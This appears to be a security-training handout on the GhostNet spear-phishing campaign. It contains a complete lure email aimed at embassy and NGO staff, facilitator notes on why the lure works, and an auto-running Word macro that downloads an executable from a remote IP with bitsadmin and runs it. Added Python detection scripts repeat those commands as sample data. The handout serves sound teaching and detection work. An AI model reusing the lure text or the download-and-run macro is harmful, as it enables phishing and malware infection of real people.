Handout A: Spear-Phishing Email Sample

One of dozens of similar phishing emails recovered from email servers during the Gh0st RAT investigation. These lures specifically targeted embassy diplomats and NGO staff interested in human rights and Tibet-related issues.


Email Message

From: director@tibethumanrights.org
To: [CLASSIFIED - Embassy Staff]
Date: March 12, 2009, 14:23 UTC
Subject: URGENT: International Tibet Human Rights Conference - March 2009

Dear Colleague,

We are pleased to inform you that the International Tibet Human Rights Conference
has been scheduled for March 28-30, 2009 in Bangkok, Thailand. This is a critical
gathering of government representatives, NGO leaders, and diplomatic staff to
discuss ongoing human rights concerns in Tibet and the broader region.

Your government has been invited to send a delegation. We are coordinating final
attendance confirmations and logistics. Please review the attached conference
materials and confirm your organization's participation.

Conference Details:
- Location: Siam Hotel, Bangkok
- Dates: March 28-30, 2009
- Registration Deadline: March 20, 2009
- Preliminary Agenda: [See attached conference_schedule.doc]

Please note that due to the sensitive nature of these discussions, we are requesting
that attendees review the conference materials on ENCRYPTED/SECURE CONNECTIONS ONLY.
Download and open the attached materials on your official government workstation.

For questions, please contact:
Conference Director - Lobsang Tendzin
Email: director@tibethumanrights.org
Phone: +66-2-249-9999

Thank you for your participation in this important diplomatic initiative.

Best regards,
International Tibet Human Rights Organization

IM NOTES (Do Not Show to Players): Analyzing this spear-phishing lure:

  1. Legitimate Organization Impersonation: The attacker mimicked a real NGO focusing on Tibet human rights. The sender address director@tibethumanrights.org is either spoofed or chosen to resemble a legitimate organization's domain.

  2. High-Value Target Profile: This email specifically targets diplomats and NGO staff who work on human rights and Tibet issues. These are exactly the people GhostNet targeted based on Citizen Lab’s investigation.

  3. Psychological Exploitation: The message plays on professional interests and geopolitical concerns. A diplomat who cares about human rights would find this message credible and urgent.

  4. Attachment Social Engineering: The attachment “conference_schedule.doc” is a Word document containing a macro-based exploit. When opened, it executes Gh0st RAT without any visible error.

  5. Sophisticated Framing: The request to open on an “official government workstation” over “secure connections” adds legitimacy and ensures the target machine is connected to the government network with access to sensitive data.

  6. Documented Pattern: Citizen Lab found dozens of nearly identical phishing emails from 2008-2009, all targeting the same profile of victims (diplomatic staff, NGO workers, Tibetan organizations).


Attachment Analysis: conference_schedule.doc

File Details:
  Filename: conference_schedule.doc
  Size: 284 KB
  Creation Date: March 10, 2009
  Modified Date: March 12, 2009
  Format: Microsoft Word 97-2003 (.doc) with embedded macro

Document Contents (visible to user):
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

International Tibet Human Rights Conference - Preliminary Schedule
March 28-30, 2009 - Siam Hotel, Bangkok

DAY 1 (March 28)
09:00 - Opening Remarks from UNHCR
10:00 - Panel: Tibet Autonomous Region Political Situation
11:30 - Panel: Religious Freedom in Central Asia
13:00 - Lunch Break
14:00 - NGO Briefings on Human Rights Concerns
15:30 - Bilateral Discussions (by invitation)
18:00 - Diplomatic Reception

DAY 2 (March 29)
...

Hidden Macro Code (Not Visible to User - Executes on Open):
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Sub AutoOpen()
  ' Macro executes automatically when document opened
  ' Downloads and executes Gh0st RAT from remote server

  Shell "cmd.exe /c bitsadmin.exe /transfer Job1 " & _
        "http://219.145.116.68/schedule.bin C:\Windows\Temp\sched.exe"
  Shell "C:\Windows\Temp\sched.exe"

  ' Close the document so the user assumes the file is corrupted and suspects nothing
  Document.Close
End Sub
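As an added example (not part of the handout), a small Python triage script of the kind a responder could run over macro text extracted from the attachment; it looks for the auto-execution trigger, shell calls, download utilities, URLs, Temp-directory paths and the self-closing call that together make up this lure. The macro text embedded below is a constructed copy of the one above, and the scoring weights are illustrative.

```python
import re

# Constructed copy of the macro text shown above, as a VBA extractor would
# dump it from the .doc; the URL and paths are the handout's own values.
SAMPLE_VBA = r"""Sub AutoOpen()
  ' Macro executes automatically when document opened
  Shell "cmd.exe /c bitsadmin.exe /transfer Job1 " & _
        "http://219.145.116.68/schedule.bin C:\Windows\Temp\sched.exe"
  Shell "C:\Windows\Temp\sched.exe"
  Document.Close
End Sub
"""

AUTO_EXEC = re.compile(r"\b(AutoOpen|AutoExec|Document_Open|Workbook_Open)\b", re.I)
EXEC_CALL = re.compile(r"\b(Shell|WScript\.Shell|CreateObject)\b", re.I)
DOWNLOADER = re.compile(r"\b(bitsadmin|certutil|powershell|mshta)(\.exe)?\b", re.I)
URL = re.compile(r"https?://[^\s\"']+", re.I)
TEMP_PATH = re.compile(r"[A-Za-z]:\\[^\s\"']*\\Temp\\[^\s\"']+", re.I)
SELF_CLOSE = re.compile(r"\b(ActiveDocument|Document)\.Close\b", re.I)

def normalize(source):
    """Join VBA line continuations (' _' before a newline) and drop comment
    lines, so a string literal split across lines, like the URL above, is seen whole."""
    joined = re.sub(r"\s*&?\s*_\s*\r?\n\s*", " ", source)
    return "\n".join(l for l in joined.splitlines() if not l.strip().startswith("'"))

def triage_vba(source):
    """Return the indicators found in the macro text plus a coarse score and verdict."""
    text = normalize(source)
    ind = {
        "auto_exec": sorted({m.lower() for m in AUTO_EXEC.findall(text)}),
        "exec_calls": sorted({m.lower() for m in EXEC_CALL.findall(text)}),
        "downloaders": sorted({m[0].lower() for m in DOWNLOADER.findall(text)}),
        "urls": URL.findall(text),
        "temp_paths": TEMP_PATH.findall(text),
        "self_close": bool(SELF_CLOSE.search(text)),
    }
    # Weights are illustrative: auto-execution combined with a download-and-run
    # chain is what separates this lure from an ordinary formatting macro.
    score = (2 * bool(ind["auto_exec"]) + 2 * bool(ind["exec_calls"])
             + 3 * bool(ind["downloaders"]) + 2 * bool(ind["urls"])
             + bool(ind["temp_paths"]) + bool(ind["self_close"]))
    ind["score"] = score
    ind["verdict"] = "malicious" if score >= 7 else "suspicious" if score >= 3 else "clean"
    return ind
```

Calling triage_vba(SAMPLE_VBA) reports the AutoOpen trigger, the Shell calls, bitsadmin, the download URL, the two Temp paths and the self-close, scoring 11 ("malicious"); a macro that only formats text scores 0.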

Exploitation Path:
  1. User opens conference_schedule.doc
  2. Macro executes automatically (no user prompt in Office 2003)
  3. Downloads Gh0st RAT executable from C2 server (219.145.116.68)
  4. Executes Gh0st RAT with SYSTEM privileges
  5. Macro closes the document; the user is left with a blank window
  6. User assumes "corrupted file" and dismisses it
  7. Gh0st RAT now has complete control of the system

IM NOTES (Do Not Show to Players): Technical sophistication:

  1. Macro-Based Attack: In 2009, Office macro security was weak. Macros could execute automatically without prompting, especially if the document came from “trusted” sources.

  2. Command-Line Tool Usage: Uses bitsadmin, the command-line client for the Windows Background Intelligent Transfer Service, which is a legitimate Windows utility for downloading files. This evades AV detection because it’s a signed Windows tool.

  3. Staged Delivery: The macro doesn’t contain the malware; it downloads it. This reduces file size and makes AV detection harder.

  4. Invisible Exploitation: The user receives no error messages or warnings. The document closes cleanly. The user assumes the file was corrupted and moves on, never knowing their system was compromised.

  5. Perfect Lure: The conference is real enough to research, the sender appears legitimate, the urgency is high, and the target audience matches perfectly – people interested in Tibet and human rights diplomacy.

This is a hallmark of APT operations: highly targeted, well-researched, using legitimate-looking pretexts.
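An added example, not from the handout: Python detection logic for the exploitation path and the bitsadmin technique described above, run over constructed process-creation events (Sysmon-style fields; the hostnames and timestamps are invented, the commands mirror the macro). It flags each stage on its own and, when one host shows Word spawning a shell, a bitsadmin transfer, and a Temp-directory executable launched from Word, raises a single chain alert.

```python
import re
from collections import defaultdict

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
LOLBINS = {"cmd.exe", "bitsadmin.exe", "powershell.exe", "mshta.exe", "certutil.exe"}
TEMP_DIR = re.compile(r"\\(windows\\)?temp\\", re.I)
URL = re.compile(r"https?://\S+", re.I)

# Constructed process-creation events (Sysmon EventID 1-style fields, one per
# line, pipe-delimited). Hostnames and timestamps are invented; the commands
# follow the handout's exploitation path, plus one benign bitsadmin call.
SAMPLE_EVENTS = r"""
2009-03-12T14:31:02Z|host=EMB-WS07|image=C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE|parent=C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE|cmd=WINWORD.EXE /n conference_schedule.doc
2009-03-12T14:31:09Z|host=EMB-WS07|image=C:\Windows\System32\cmd.exe|parent=C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE|cmd=cmd.exe /c bitsadmin.exe /transfer Job1 http://219.145.116.68/schedule.bin C:\Windows\Temp\sched.exe
2009-03-12T14:31:10Z|host=EMB-WS07|image=C:\Windows\System32\bitsadmin.exe|parent=C:\Windows\System32\cmd.exe|cmd=bitsadmin.exe /transfer Job1 http://219.145.116.68/schedule.bin C:\Windows\Temp\sched.exe
2009-03-12T14:31:15Z|host=EMB-WS07|image=C:\Windows\Temp\sched.exe|parent=C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE|cmd=C:\Windows\Temp\sched.exe
2009-03-12T14:35:40Z|host=EMB-WS12|image=C:\Windows\System32\bitsadmin.exe|parent=C:\Windows\System32\svchost.exe|cmd=bitsadmin.exe /list
"""

def parse(line):
    """Split one pipe-delimited event into a dict and add lowercase basenames."""
    ts, *fields = line.split("|")
    ev = {"ts": ts}
    for f in fields:
        k, v = f.split("=", 1)
        ev[k] = v
    ev["image_name"] = ev["image"].rsplit("\\", 1)[-1].lower()
    ev["parent_name"] = ev["parent"].rsplit("\\", 1)[-1].lower()
    return ev

def detect(events_text):
    """Return (host, rule, detail) alerts: one per matching event, plus one chain alert per host."""
    alerts, stages = [], defaultdict(set)
    for line in events_text.strip().splitlines():
        ev = parse(line)
        host = ev["host"]
        if ev["parent_name"] in OFFICE and ev["image_name"] in LOLBINS:
            alerts.append((host, "office_spawns_lolbin", ev["image_name"]))
            stages[host].add("spawn")
        if ev["image_name"] == "bitsadmin.exe" and "/transfer" in ev["cmd"].lower():
            m = URL.search(ev["cmd"])
            alerts.append((host, "bitsadmin_download", m.group(0) if m else "?"))
            stages[host].add("download")
        if TEMP_DIR.search(ev["image"]) and ev["parent_name"] in OFFICE | {"cmd.exe"}:
            alerts.append((host, "temp_exec_from_office", ev["image"]))
            stages[host].add("execute")
    for host, seen in stages.items():
        if {"spawn", "download", "execute"} <= seen:
            alerts.append((host, "staged_macro_download_chain", sorted(seen)))
    return alerts
```

detect(SAMPLE_EVENTS) yields three stage alerts and one chain alert for EMB-WS07, and nothing for the host that only ran bitsadmin /list from svchost.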


Key Discovery Questions

  • How would an embassy staff member distinguish this email from a legitimate conference invitation?

They probably wouldn’t, without independently verifying the sender’s email domain or calling the conference organizers directly. The email is professionally written, the invitation is real (the conference does exist), and the urgency is appropriate for diplomatic communications.

  • Why would opening a Word document be dangerous?

Office macros (especially in older versions) could execute automatically without user interaction. This is why modern Office versions either disable macros by default or require explicit user permission.

  • How would the attacker know to target someone at this specific embassy?

Prior reconnaissance. The attacker researched which government employees work on Tibet and human rights issues, then sent targeted emails to their email addresses. This suggests either HUMINT (human intelligence) or prior email address collection.

Citizen Lab documented that GhostNet compromised 1,295 computers across 103 countries, with special focus on Tibetan NGOs and diplomatic missions. The targeting was extremely sophisticated and selective.

IM Facilitation Notes

This handout shows:

  • Spear-phishing as an APT vector
  • Social engineering exploiting professional interests
  • Weaponized documents using Office macros
  • Invisible exploitation (no error messages)
  • Intelligence-driven targeting